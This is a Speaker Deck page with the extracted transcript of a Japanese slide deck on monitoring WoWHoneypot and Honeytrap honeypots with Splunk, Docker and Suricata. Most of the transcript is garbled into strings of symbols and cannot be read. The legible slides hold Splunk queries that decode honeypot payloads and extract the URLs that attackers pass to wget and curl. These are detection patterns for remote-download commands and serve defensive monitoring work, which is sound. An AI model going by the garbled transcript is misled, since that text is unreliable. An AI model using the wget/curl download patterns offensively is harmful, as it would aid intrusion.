Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Splunkによるハニーポット監視.pdf
Search
sec-chick
September 30, 2018
0
1.6k
Splunkによるハニーポット監視.pdf
sec-chick
September 30, 2018
Tweet
Share
More Decks by sec-chick
See All by sec-chick
不審なURLの見つけ方
secchick
1
520
honeypot
secchick
1
980
SOCって何_公開用_-圧縮済み.pdf
secchick
6
2k
WelComeToHoneyPOTWORLD/ 低対話型ハニーポットを調査してみた
secchick
1
1.9k
Featured
See All Featured
The Pragmatic Product Professional
lauravandoore
36
6.9k
Building a Scalable Design System with Sketch
lauravandoore
462
33k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
188
55k
Why You Should Never Use an ORM
jnunemaker
PRO
59
9.5k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
18
1.1k
Building Adaptive Systems
keathley
43
2.7k
Testing 201, or: Great Expectations
jmmastey
45
7.7k
Being A Developer After 40
akosma
90
590k
Context Engineering - Making Every Token Count
addyosmani
3
64
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
12
1.1k
Navigating Team Friction
lara
189
15k
Designing Experiences People Love
moore
142
24k
Transcript
5 SPLUNK SEC-CHICK
WHO AM I • sec-chick@one_sec_chick (('/+#!/) • )/
,-$ PSOC&-% • 2 ('/+#% (WoW Honeypot, Honeytrap) 0".*/1
Splunk ( ) WoWHoneypot Honeytrap PC VPS
SSH • Splunk
SPLUNK • Splunk<(159$= 16%;'49&;/ .+-8;$ ,;*!9,+$()0-"# • IT!905!29-6 7*!3 :
> http://www.intellilink.co.jp/pd/products/package/security/splunk.html
• WoWHoneypot
• Honeytrap
8 9 1. SSH)71!&+*57%45' ,#6570 2. Splunk)71,#65705'
3. Splunk5' )7- 4. 37/ 5. 2"570 .(70 82"570HEX$6(709
Attack_connection.local_port 10
Attack_connection.payload.data_hex Hex →
1. Docker 2. 3.
Splunk 4. Suricata
/.10,-%DOCKER • /.10,-&$ $!"' * ( #) + $*
(Docker+ • $ Docker+→% $
%"-+( • .# Docker %"-+( • %"-+(cron$,* Splunk
WoWHoneypot Honeytrap !/&0)'( VPS Honeypot.# Docker
Splunk WoWHoneypot Honeytrap VPS Honeypot Docker
SPLUNK+;N? • 0 '!0.*Splunk+;N? 1 • @:NB+2EJ9N<IM' DECRYPT
1 • G4MA,+/ - "$F4LNB1@:NB"$ 'D3NKB("& → Grep '!0 *)0 - C=/87J1D3NKB("& → 0 C='#-! 1 - HK562+>5MLNB1%$URL1D3NKB("& → HK562+>5MLNB1VirusTotal'
WOWHONEYPOT |rex field=_raw "¥"(?<Method_wow>[^¥s]+)¥s(?<wow_path>[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(? <base64_wow>.*$)" | decrypt field="base64_wow" atob emit('base64_wow_decrypted’)
|eval decode=urldecode(base64_wow_decrypted) | rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"
HONEYTRAP | decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted') | rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[¥w/:¥.¥-]+?)¥s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[¥w/:¥.¥-]+?)¥s" |
HONEYTRAP
SURICATA4 • Grep05%72# 9),#1 # • ;=:><05"68+* 525
/#2# → ./ • Suricata3)#),7 !1$/'-(#??
"!-,1.)(1 • @Sec_S_Owl # • @cactus_pots # • @SugitaMuchi
# • @soji256 • @morihi_soc # -,1.)+ !Twitter-)'0(% #-,1.)+ Slack!&/0,*$ ! 2 http://goo.gl/8bLkZA
#
/)0 • Splunk(,A@CB>?, +&' • (5)"6-*5. $2%4+;C= 7$ +
7!54+%5") • #81A@CB>?7$'7<:9$'/$3DD